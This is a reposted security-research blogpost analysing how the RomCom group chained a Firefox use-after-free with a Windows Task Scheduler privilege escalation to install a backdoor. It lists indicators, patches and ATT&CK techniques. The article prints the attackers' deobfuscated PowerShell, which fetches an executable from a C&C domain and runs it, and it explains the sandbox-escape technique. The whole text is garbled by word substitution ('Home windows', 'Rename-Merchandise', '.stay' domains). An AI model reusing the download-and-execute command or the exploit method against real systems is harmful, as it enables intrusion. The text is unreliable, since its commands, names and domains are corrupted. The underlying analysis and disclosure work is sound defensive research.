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Thursday, November 28, 2024

RomCom exploits Firefox and Home windows zero days within the wild


ESET researchers found a beforehand unknown vulnerability in Mozilla merchandise, exploited within the wild by Russia-aligned group RomCom. That is a minimum of the second time that RomCom has been caught exploiting a big zero-day vulnerability within the wild, after the abuse of CVE-2023-36884 through Microsoft Phrase in June 2023.

This important vulnerability, assigned CVE-2024-9680 with a CVSS rating of 9.8, permits susceptible variations of Firefox, Thunderbird, and the Tor Browser to execute code within the restricted context of the browser. Chained with one other beforehand unknown vulnerability in Home windows, assigned CVE-2024-49039 with a CVSS rating of 8.8, arbitrary code might be executed within the context of the logged-in person. In a profitable assault, if a sufferer browses to an online web page containing the exploit, an adversary can run arbitrary code – with none person interplay required – which on this case led to the set up of RomCom’s eponymous backdoor on the sufferer’s pc.

Key factors of this blogpost:

  • On October 8th, 2024, ESET researchers found a beforehand unknown zero-day vulnerability in Mozilla merchandise being exploited within the wild.
  • Evaluation of the exploit led to the invention of the vulnerability, now assigned CVE-2024-9680: a use-after-free bug within the animation timeline characteristic in Firefox. Mozilla patched the vulnerability on October 9th, 2024.
  • Additional evaluation revealed one other zero-day vulnerability in Home windows: a privilege escalation bug, now assigned CVE‑2024‑49039, that enables code to run outdoors of Firefox’s sandbox. Microsoft launched a patch for this second vulnerability on November 12th, 2024.
  • Profitable exploitation makes an attempt delivered the RomCom backdoor, in what seems to be like a widespread marketing campaign.

RomCom profile

RomCom (also referred to as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts each opportunistic campaigns in opposition to chosen enterprise verticals and focused espionage operations. The group’s focus has shifted to incorporate espionage operations amassing intelligence, in parallel with its extra typical cybercrime operations. The backdoor utilized by the group is able to executing instructions and downloading further modules to the sufferer’s machine.

Desk 1 exhibits the sectors focused, in accordance with our analysis, by RomCom in 2024. This highlights that the group is engaged in espionage but in addition cybercrime operations.

Desk 1. RomCom victims in 2024

Vertical and area Function First seen
Governmental entity in Ukraine Espionage 2024-01
Pharmaceutical sector within the US Cybercrime 2024-03
Authorized sector in Germany Cybercrime 2024-03
Insurance coverage sector within the US Cybercrime 2024-04
Protection sector in Ukraine Espionage 2024-08
Vitality sector in Ukraine Espionage 2024-08
Governmental entities in Europe Espionage 2024-08
Worldwide concentrating on – Firefox exploit Unknown 2024-10

Compromise chain

The compromise chain consists of a pretend web site that redirects the potential sufferer to the server internet hosting the exploit, and may the exploit succeed, shellcode is executed that downloads and executes the RomCom backdoor – an instance of which is depicted in Determine 1. Whereas we don’t understand how the hyperlink to the pretend web site is distributed, nevertheless, if the web page is reached utilizing a susceptible browser, a payload is dropped and executed on the sufferer’s pc with no person interplay required. Lastly, a JavaScript redirection is carried out utilizing window.location.href after a number of seconds, giving the exploit time to run.

Figure 1. Exploit chain to compromise the victim
Determine 1. Exploit chain to compromise the sufferer

From October 10th, 2024 to October 16th, 2024, simply after the primary vulnerability was patched, we discovered different C&C servers internet hosting the exploit. They used a recurring naming scheme for his or her pretend servers by including the prefix or suffix redir or purple to a professional area, typically additionally altering its top-level area (TLD), as proven in Desk 2. The redirection on the finish of the exploitation try took the victims to the professional web site on the unique area title, presumably to keep away from elevating the targets’ suspicions.

Desk 2. Faux servers redirecting to the exploit

First seen Faux server Remaining redirect to Redirect web site objective
2024⁠-⁠10⁠-⁠10 redircorrectiv[.]com correctiv.org Nonprofit unbiased newsroom.
2024⁠-⁠10⁠-⁠14 devolredir[.]com devolutions.internet Distant entry and password administration options.
2024⁠-⁠10⁠-⁠15 redirconnectwise[.]cloud connectwise.com MSP expertise and IT administration software program.
2024⁠-⁠10⁠-⁠16 redjournal[.]cloud connectwise.com

If a sufferer utilizing a susceptible browser visits an online web page serving this exploit, the vulnerability is triggered and shellcode is executed in a content material course of. The shellcode consists of two elements: the primary retrieves the second from reminiscence and marks the containing pages as executable, whereas the second implements a PE loader based mostly on the open-source undertaking Shellcode Reflective DLL Injection (RDI).

The loaded library implements a sandbox escape for Firefox that results in downloading and executing the RomCom backdoor on the sufferer’s pc. The backdoor is staged at a C&C server positioned at journalctd[.]stay, correctiv[.]sbs, or cwise[.]retailer, relying on the pattern.

In response to our telemetry, from October 10th, 2024 to November 4th, 2024, potential victims who visited web sites internet hosting the exploit have been positioned largely in Europe and North America, as proven in Determine 2. The variety of potential targets runs from a single sufferer per nation to as many as 250, in accordance with ESET telemetry.

Figure 2. Heatmap of potential victims
Determine 2. Heatmap of potential victims

CVE-2024-9680: Use-after-free in Firefox animation timeline

On October 8th, 2024, we discovered attention-grabbing information used to ship the RomCom backdoor, hosted on the server 1drv.us[.]com managed by the menace actor. The exploits goal a use-after-free vulnerability in Firefox animation timelines, permitting an attacker to attain code execution in a content material course of. Throughout our investigation, we analyzed the information referenced in Desk 3.

Desk 3. Information associated to the exploit

Identify Description
main-128.js JavaScript file containing the exploit for variations of Firefox from 106 to 128.
main-129.js JavaScript file containing the exploit for variations of Firefox from 129 to 131.
main-tor.js JavaScript file containing the exploit for Tor Browser variations 12 and 13.
script.js JavaScript file used to generate a CAPTCHA.
utils.js JavaScript file containing helper capabilities, e.g., to transform information varieties, or to get the OS kind or browser model.
animation0.html HTML iframe loaded by the exploit to set off the use-after-free vulnerability.
index.html HTML web page loading the exploit and redirecting to a professional web site after a number of seconds.

Timestamps associated to those information point out that they have been created on October 3rd, 2024 and made obtainable on-line; however, the menace actor might need been in possession of this exploit sooner than this.

We reported the vulnerability to Mozilla shortly after discovery, with the next timeline of occasions:

  • 2024-10-08: Discovery and preliminary evaluation.
  • 2024-10-08: Vulnerability reported to Mozilla.
  • 2024-10-08: Vulnerability acknowledged by Mozilla.
  • 2024-10-09: CVE-2024-9680 assigned by Mozilla Company.
  • 2024-10-09: Vulnerability patched in Firefox, Safety Advisory 2024-51.
  • 2024-10-09: Vulnerability patched in Tor Browser with launch 13.5.7.
  • 2024-10-10: Vulnerability patched in Tails with launch 6.8.1.
  • 2024-10-10: Vulnerability patched in Thunderbird, Safety Advisory 2024-52.

We wish to thank the group at Mozilla for being very responsive and spotlight their spectacular work to launch a patch inside a day.

Mozilla and the Tor Venture launched a patch that fixes the vulnerability within the following variations:

  • Firefox 131.0.2
  • Firefox ESR 115.16.1
  • Firefox ESR 128.3.1
  • Tor Browser 13.5.7
  • Tails 6.8.1
  • Thunderbird 115.16
  • Thunderbird 128.3.1
  • Thunderbird 131.0.1

In the course of the preparation of this blogpost, unbiased researcher Dimitri Fourny launched a detailed evaluation of the vulnerability on November 14th, 2024.

Root trigger evaluation

The main-.js first checks the precise model of the browser, and determines its exploitability by checking some particular objects’ offsets and sizes for an affected model. If these checks cross, it proceeds so as to add an HTML iframe into the exploit web page, applied in animation0.html. The latter creates 4 HTML div components recognized respectively as target0 to target3, however most significantly it defines a getter perform for the Object.prototype’s then property as proven in Determine 3. This perform will set off the use-after-free vulnerability as defined under. Notice that the feedback (in darkish inexperienced) are from the exploit authors; this might point out that the exploit was nonetheless in a developmental part or that the menace actor purchased it.

Figure 3. The JavaScript exploit defines the then property’s getter function on every object
Determine 3. The JavaScript exploit defines the then property’s getter perform on each object, triggering a use-after-free vulnerability

After some preliminary heap spraying, the put together perform creates 4 Animation objects, one for every div aspect beforehand created, as illustrated in Determine 4. These animation objects are dealt with by an AnimationTimeline object.

Figure 4. The exploit code creates animation objects for div elements
Determine 4. The exploit code creates animation objects for div components

In the course of the doc animation timeline, the take a look at perform known as, which pauses and will get the prepared property of the primary and second animation objects. As said within the documentation, the prepared property returns a Promise that resolves when the animation is able to be performed. Calling the then technique on the promise causes the getter perform proven in Determine 3 to be referred to as. Primarily, this perform increments a worldwide flag variable and when it reaches 2, the primary animation object (anim0) is cancelled, and all of the div components are eliminated. The decision to the rm0 perform (proven in Determine 3) units the animation objects to null with a purpose to free them, which triggers the use-after-free vulnerability. This perform additionally does some heap feng shui and, within the initially found exploit, calls the getInfo perform chargeable for attaining code execution.

Within the meantime, because the animation0.html doc is being refreshed, the Tick technique of its AnimationTimeline object known as periodically. As seen in Determine 5, this technique iterates over the totally different animation objects current within the animation timeline and appends animations to be eliminated to an area array variable referred to as animationsToRemove.

Figure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to local array variable animationsToRemove
Determine 5. In AnimationTimeline::Tick, animation objects to be eliminated are appended to native array variable animationsToRemove

The bug lies in that, whereas iterating over the totally different animation objects of the animation timeline, the Tick technique of the Animation object known as, which may result in the releasing of the present animation object, leading to dealing with a dangling pointer. Whereas debugging the exploit, we noticed a sequence of calls that finally ended up within the getter perform defined above, as illustrated in Determine 6 and Determine 7.

Figure 6. Call stack of the animation being cancelled
Determine 6. Name stack of the animation being cancelled by the getter perform referred to as through the Animation::Tick technique
Figure 7. The Animation PauseAt method ends up calling the getter function
Determine 7. The Animation::PauseAt technique finally ends up calling the getter perform

The getter perform calls Animation::Cancel which in flip calls AnimationTimeline::RemoveAnimation. Then, the animation objects anim0 and anim1 are set to null to ensure that them to get freed. When AnimationTimeline::Tick then iterates over the array animationsToRemove (line 74 in Determine 5), AnimationTimeline::RemoveAnimation will manipulate a dangling pointer of an Animation object that was already eliminated, as proven in Determine 8.

Figure 8. Call stack of the crash in AnimationTimeline RemoveAnimation
Determine 8. Name stack of the crash in AnimationTimeline::RemoveAnimation whereas manipulating a dangling pointer

After releasing the animations within the rm0 perform, the exploit proceeds with extra heap administration with a purpose to management the objects that can change the freed animations, and eventually, the getInfo perform known as, as seen in Determine 9.

Figure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it
Determine 9. Exploit code perform rm0 triggers the use-after-free bug and exploits it

With out going into an excessive amount of element in regards to the exploit code, its writer abused div objects and their attributes in addition to ImageData objects to leak properties of the latter, as noticed in Determine 10.

Figure 10. Exploit code getInfo function attempts to leak an ImageData object
Determine 10. Exploit code getInfo perform makes an attempt to leak an ImageData object

Then, the exploit code proceeds to control ArrayBuffer objects in order to leak the handle of an arbitrary JavaScript object (referred to as an addrof primitive) and abuse the Firefox JIT compiler to execute the primary shellcode part within the context of a content material course of, as illustrated in Determine 11. This system is defined in nice element on this blogpost.

Figure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode
Determine 11. The exploit code abuses the Firefox JIT compiler to execute shellcode

Mozilla patched the vulnerability in Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 on October 9th, 2024. Primarily, the tips that could the animation objects dealt with by the timeline at the moment are applied by way of reference-counting pointers (RefPtr), as urged by the diff, which prevents the animations from being freed, since AnimationTimeline::Tick will nonetheless maintain a reference to them.

Shellcode evaluation

Each shellcodes are saved within the JavaScript exploit file main-.js. The primary one is dynamically created as an array of float numbers whereas the second is saved as an enormous array of bytes.

Egghunting shellcode

This primary shellcode merely retrieves the second shellcode by looking out in reminiscence for a hardcoded magic worth of 0x8877665544332211, modifications its reminiscence safety to read-write-execute (RWX), and executes the code positioned at this handle.

Reflective loader shellcode

This second shellcode is the compiled model of the Shellcode RDI undertaking, which allows a DLL to be loaded. The constants used within the shellcode weren’t modified by the menace actor (see https://github.com/monoxgas/sRDI/blob/grasp/Native/Loader.cpp#L367 vs. the constants proven in Determine 12).

Figure 12. The constants used in the public Shellcode RDI project remained unchanged
Determine 12. The constants used within the public Shellcode RDI undertaking remained unchanged

The shellcode merely hundreds an embedded library whose sole objective is to flee the restrictions of Firefox’s sandboxed content material course of.

CVE-2024-49039: Privilege escalation in Home windows Activity Scheduler

The loaded library (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its builders and compiled on October 3rd, 2024, implements a sandbox escape from the untrusted course of degree of the content material course of to a medium degree. Primarily, the library makes use of an undocumented RPC endpoint, which mustn’t have been callable from an untrusted course of degree, to launch a hidden PowerShell course of that downloads a second stage from a C&C server.

The timeline of the vulnerability disclosure is the next:

  • 2024-10-08: As a part of our preliminary report back to Mozilla for CVE-2024-9680, we additionally supplied what we believed to be a sandbox escape.
  • 2024-10-14: Mozilla’s safety group confirmed the sandbox escape and deemed the vulnerability to be tied to a Home windows safety flaw. They suggested us that that they had contacted the Microsoft Safety Response Heart (MSRC) to evaluate the vulnerability.
  • 2024-11-12: Microsoft launched an advisory for CVE-2024-49039 and its corresponding patch by way of the replace KB5046612. The vulnerability was additionally independently discovered by Vlad Stolyarov and Bahare Sabouri of Google’s Menace Evaluation Group, as talked about in KB5046612.

Root trigger evaluation

The sandbox escape code resides within the comparatively small major perform of the library. It makes use of an undocumented RPC endpoint, as illustrated in Determine 13.

Figure 13. The PocLowIL library prepares to interact with a task-related endpoint
Determine 13. The PocLowIL library prepares to work together with a task-related endpoint

The perform proceeds to populate undocumented buildings and calls NdrClientCall2 3 times. The primary parameter handed to this perform, pStubDescriptor, is a MIDL_STUB_DESC construction whose RpcInterfaceInformation member factors to an interface recognized by the GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. This interface is applied within the Home windows library WPTaskScheduler.dll, loaded by schedsvc.dll, hosted within the strategy of the duty scheduler service (svchost.exe).

In response to our evaluation of this interface, the sandbox escape code calls the next capabilities:

  • s_TaskSchedulerCreateSchedule
  • s_TaskSchedulerExecuteSchedule
  • s_TaskSchedulerDeleteSchedule (used just for cleanup)

Utilizing RpcView and after partially reversing some buildings, we discovered the primary buildings, as illustrated in Determine 14.

Figure 14. The main structures used to create a scheduled task through the RPC interface
Determine 14. The primary buildings used to create a scheduled job by way of the RPC interface

After making use of these buildings in IDA Professional, we obtained a clearer overview of the duty, as seen in Determine 15.

Figure 15. IDA Pro pseudocode view of the sandbox escape code
Determine 15. IDA Professional pseudocode view of the sandbox escape code

Primarily based on the code, the malicious library creates a scheduled job that can run an arbitrary utility at medium integrity degree, permitting the attackers to raise their privileges on the system and get away of the sandbox. That is potential as a result of lack of restrictions imposed on the safety descriptor utilized to the RPC interface throughout its creation, as illustrated in Determine 16.

Figure 16. Permissive security descriptor applied to the RPC interface
Determine 16. Permissive safety descriptor utilized to the RPC interface

The renamed variable interface_security_descriptor, used when RpcServerRegisterIf3 known as, has the next worth: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). In response to the Safety Descriptor Definition Language (SDDL), it permits everybody (WD) to speak with the RPC interface and name its procedures no matter their integrity degree.

Exploitation

On this case, the menace actor created a job named firefox.exe that can launch conhost.exe in headless mode with a purpose to disguise the kid course of window. The deobfuscation of the remainder of the command line (proven in Determine 15) revealed the PowerShell code seen in Determine 17.

$a=$env:public + 'public';
Invoke-WebRequest https://journalctd[.]stay/JfWb4OrQPLh -o $a;
sleep 15;
Rename-Merchandise $a ($a = ($a + '.exe')) # $env:publicpublic.exe
Begin-Course of $a;
sleep 10;
Rename-Merchandise $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:publicepublic.exe
Begin-Course of $a

Determine 17. PowerShell code downloading a next-stage part

An executable is downloaded from https://journalctd[.]stay/JfWb4OrQPLh, saved within the %PUBLIC% folder as public.exe, and run. After 10 seconds, it’s renamed as epublic.exe and run once more.

Transient patch evaluation

The patched model of WPTaskScheduler.dll (model 10.0.19041.5129) launched with KB5046612 makes use of a extra sophisticated safety descriptor, as proven in Determine 18.

Figure 18. The security descriptor introduced by the patch is more restrictive
Determine 18. The safety descriptor launched by the patch is extra restrictive

The brand new safety descriptor is:

D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)

Breaking down the string reveals the next restriction logic:

  • the system (SY) and native service (LS) accounts are granted learn, write, and execute entry,
  • the community service (NS) account and interactive customers (IU) are granted solely learn entry,
  • lastly, objects under medium degree (ME) integrity are denied learn, write, and execute entry.

The brand new restrictions imposed by the up to date safety descriptor stop the privilege escalation and render the sandbox escape code out of date.

Conclusion

Chaining collectively two zero-day vulnerabilities armed RomCom with an exploit that requires no person interplay. This degree of sophistication exhibits the menace actor’s will and means to acquire or develop stealthy capabilities. ESET shared detailed findings with Mozilla, following our coordinated vulnerability disclosure course of shortly after discovery. Mozilla launched a blogpost about how they reacted to the disclosure and have been in a position to launch a repair inside 25 hours, which could be very spectacular compared to business requirements.

For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com
ESET Analysis presents non-public APT intelligence reviews and information feeds. For any inquiries about this service, go to the ESET Menace Intelligence web page.

IoCs

A complete record of indicators of compromise and samples might be present in our GitHub repository.

Information

SHA-1 Filename Detection Description
A4AAD0E2AC1EE0C8DD25968FA4631805689757B6 utils.js JS/Exploit.Agent.NSF RomCom Firefox exploit.
CA6F8966A3B2640F49B19434BA8C21832E77A031 main-tor.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
21918CFD17B378EB4152910F1246D2446F9B5B11 main-128.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
703A25F053E356EB6ECE4D16A048344C55DC89FD main-129.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6 PocLowIL.dll Win64/Runner.AD RomCom Firefox sandbox escape.
A9D445B77F6F4E90C29E385264D4B1B95947ADD5 PocLowIL.dll Win64/Runner.AD RomCom Tor browser sandbox escape.

Community

IP Area Internet hosting supplier First seen Particulars
194.87.189[.]171 journalctd[.]stay Aeza Worldwide LTD 2024⁠-⁠10⁠-⁠08 RomCom second-stage C&C server.
178.236.246[.]241 correctiv[.]sbs AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠09 RomCom second-stage C&C server.
62.60.238[.]81 cwise[.]retailer AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠15 RomCom second-stage C&C server.
147.45.78[.]102 redircorrectiv[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠10 RomCom exploit supply C&C server.
46.226.163[.]67 devolredir[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠14 RomCom exploit supply C&C server.
62.60.237[.]116 redirconnectwise[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠15 RomCom exploit supply C&C server.
62.60.237[.]38 redjournal[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠16 RomCom exploit supply C&C server.
194.87.189[.]19 1drv.us[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠08 RomCom malware supply C&C server.
45.138.74[.]238 economistjournal[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠16 RomCom exploit redirection C&C server.
176.124.206[.]88 N/A AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠08 RomCom second-stage C&C server.

MITRE ATT&CK methods

This desk was constructed utilizing model 16 of the MITRE ATT&CK framework.

Tactic ID Identify Description
Useful resource Improvement T1583 Purchase Infrastructure RomCom units up VPSes and buys domains.
T1587.001 Develop Capabilities: Malware RomCom develops malware in a number of programming languages.
T1587.004 Develop Capabilities: Exploits RomCom could develop exploits used for preliminary compromise.
T1588.003 Get hold of Capabilities: Code Signing Certificates RomCom obtains legitimate code-signing certificates to signal its malware.
T1588.005 Get hold of Capabilities: Exploits RomCom could purchase exploits used for preliminary compromise.
T1588.006 Get hold of Capabilities: Vulnerabilities RomCom could receive details about vulnerabilities it makes use of for concentrating on victims.
T1608 Stage Capabilities RomCom phases malware on a number of supply servers.
Preliminary Entry T1189 Drive-by Compromise RomCom compromises victims by way of a person visiting a web site internet hosting an exploit.
Execution T1053.005 Scheduled Activity/Job: Scheduled Activity RomCom creates a scheduled job utilizing RCP to execute the subsequent stage downloader.
Persistence T1546.015 Occasion Triggered Execution: Element Object Mannequin Hijacking The RomCom backdoor hijacks DLLs loaded by explorer.exe or wordpad.exe for persistence.
Privilege Escalation T1068 Exploitation for Privilege Escalation RomCom exploits a vulnerability to flee the Firefox sandbox.
Protection Evasion T1622 Debugger Evasion The RomCom backdoor detects debuggers by registering an exception handler.
T1480 Execution Guardrails The RomCom backdoor checks whether or not the system state is appropriate for execution.
T1027.011 Obfuscated Information or Info: Fileless Storage The RomCom backdoor is saved encrypted within the registry.
T1553.002 Subvert Belief Controls: Code Signing The RomCom backdoor weakens safety mechanisms through the use of trusted code-signing certificates.
Credential Entry T1555.003 Credentials from Password Shops: Credentials from Net Browsers The RomCom backdoor collects passwords, cookies, and periods utilizing a browser stealer module.
T1552.001 Unsecured Credentials: Credentials In Information The RomCom backdoor collects passwords utilizing a file reconnaissance module.
Discovery T1087 Account Discovery The RomCom backdoor collects username, pc, and area information.
T1518 Software program Discovery The RomCom backdoor collects details about put in software program and variations.
T1614 System Location Discovery The RomCom backdoor checks for a particular keyboard format ID (KLID).
Lateral Motion T1021 Distant Companies The RomCom backdoor creates SSH tunnels to maneuver laterally inside compromised networks.
Assortment T1560 Archive Collected Information The RomCom backdoor shops information in a ZIP archive for exfiltration.
T1185 Man within the Browser The RomCom backdoor steals browser cookies, historical past, and saved passwords.
T1005 Information from Native System The RomCom backdoor collects particular file varieties based mostly on file extensions.
T1114.001 E mail Assortment: Native E mail Assortment The RomCom backdoor collects information with .msg, .eml, and .electronic mail extensions.
T1113 Display Seize The RomCom backdoor takes screenshots of the sufferer’s pc.
Command and Management T1071.001 Commonplace Utility Layer Protocol: Net Protocols The RomCom backdoor makes use of HTTP or HTTPS as a C&C protocol.
T1573.002 Encrypted Channel: Uneven Cryptography The RomCom backdoor encrypts communication utilizing SSL certificates.
Exfiltration T1041 Exfiltration Over Command-and-Management Channel The RomCom backdoor exfiltrates information utilizing the HTTPS C&C channel.
Influence T1565 Information Manipulation RomCom manipulates programs and steals information.
T1657 Monetary Theft RomCom compromises firms for monetary curiosity.

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